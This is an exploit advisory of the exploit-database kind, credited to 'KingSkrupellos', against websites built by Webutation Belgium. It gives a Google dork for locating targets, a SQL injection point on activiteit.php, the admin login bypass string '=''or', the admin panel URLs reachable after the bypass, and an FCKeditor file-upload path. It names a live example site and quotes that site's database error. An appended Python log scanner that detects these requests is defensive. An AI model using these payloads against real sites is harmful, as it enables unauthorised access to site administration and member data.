#################################################################################################

# Exploit Title : Copyright © 2011 - 2018 Webutation Belgium Multiple Vulnerabilities
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 18/09/2018
# Vendor Homepage : webutation.net ~ webutation.org
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 - [ Authentication Bypass Issues ] + CWE-89 - [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dork  : 

intext:Copyright © 2011 - 2018 Webutation site:be

© Webutation 2018

# SQL Injection Exploit => 

/activiteit.php?id=[SQL Inj]

# Admin Panel Login Path => 

/admin/login.php

# Admin Login Bypass Exploit : 

Username : '=''or'

Password : '=''or'

# Usable Admin Panel Control URL Links => 

/admin/ingelogged.php
/admin/activiteiten.php
/admin/info.php
/admin/medewerkers.php
/admin/leden.php
/admin/gastenboek.php
/admin/verslagen.php

# FCKEditor Filemanager Exploit =>    

TARGET/fckeditor/editor/filemanager/connectors/uploadtest.html

TARGET/yourfilenamehere.txt

#################################################################################################

# Example Site => tgeverke.be => [ Proof of Concept for Authentication Bypass ] => archive.is/OQ8GQ

# Example Site for SQL Inj =>  tgeverke.be/activiteit.php?id=465%27

# SQL Database Error => 

FOUT1: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''465''' at line 1
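
For site operators, an added example (not part of the original advisory) that scans a web server access log for the two request patterns listed above: a non-integer id on activiteit.php and any hit on the FCKeditor filemanager connectors. The log lines are constructed samples and the Apache combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (Apache combined log format, documentation IP range).
SAMPLE_LOG = """\
192.0.2.10 - - [18/Sep/2018:10:01:02 +0200] "GET /activiteit.php?id=465 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [18/Sep/2018:10:03:17 +0200] "GET /activiteit.php?id=465%27 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
192.0.2.44 - - [18/Sep/2018:10:05:40 +0200] "GET /fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.10 - - [18/Sep/2018:10:06:00 +0200] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.44 - - [18/Sep/2018:10:07:12 +0200] "POST /admin/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
FCK_CONNECTORS = "/fckeditor/editor/filemanager/connectors/"


def classify(line):
    """Return (ip, reason, target) for a suspicious request line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    path = url.path.lower()
    if path.endswith("/activiteit.php"):
        # parse_qs percent-decodes, so id=465%27 is seen as "465'".
        ids = parse_qs(url.query, keep_blank_values=True).get("id", [])
        if len(ids) > 1 or any(not re.fullmatch(r"[0-9]+", v) for v in ids):
            return (m["ip"], "non-integer id on activiteit.php", m["target"])
    if FCK_CONNECTORS in path:
        return (m["ip"], "FCKeditor filemanager connector accessed", m["target"])
    # POST bodies are not in access logs, so the /admin/login.php bypass
    # strings are not visible here; that needs application-side logging.
    return None


def scan(log_text):
    """Classify every line of a log and keep only the flagged requests."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for ip, reason, target in scan(SAMPLE_LOG):
        print(f"{ip}\t{reason}\t{target}")
```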

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################